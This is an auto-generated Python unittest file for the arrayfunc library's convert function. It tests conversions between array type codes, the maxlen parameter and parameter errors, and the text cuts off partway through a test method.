# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for convert.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class convert_b(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'b'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code b - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code b - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code b - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code b - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code b - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code b - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code b - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code b - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code b - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code b - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code b - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code b - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code b - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_b(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'b'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code b - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code b - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code b - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code b - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code b - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code b - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code b - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_B(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'B'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code B - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code B - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code B - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code B - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code B - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code B - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code B - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code B - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code B - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code B - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code B - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code B - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code B - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_B(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'B'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code B - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code B - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code B - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code B - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code B - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code B - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code B - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_h(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'h'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code h - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code h - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code h - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code h - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code h - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code h - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code h - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code h - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code h - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code h - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code h - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code h - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code h - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_h(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'h'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code h - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code h - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code h - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code h - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code h - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code h - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code h - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_H(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'H'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code H - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code H - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code H - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code H - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code H - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code H - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code H - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code H - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code H - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code H - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code H - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
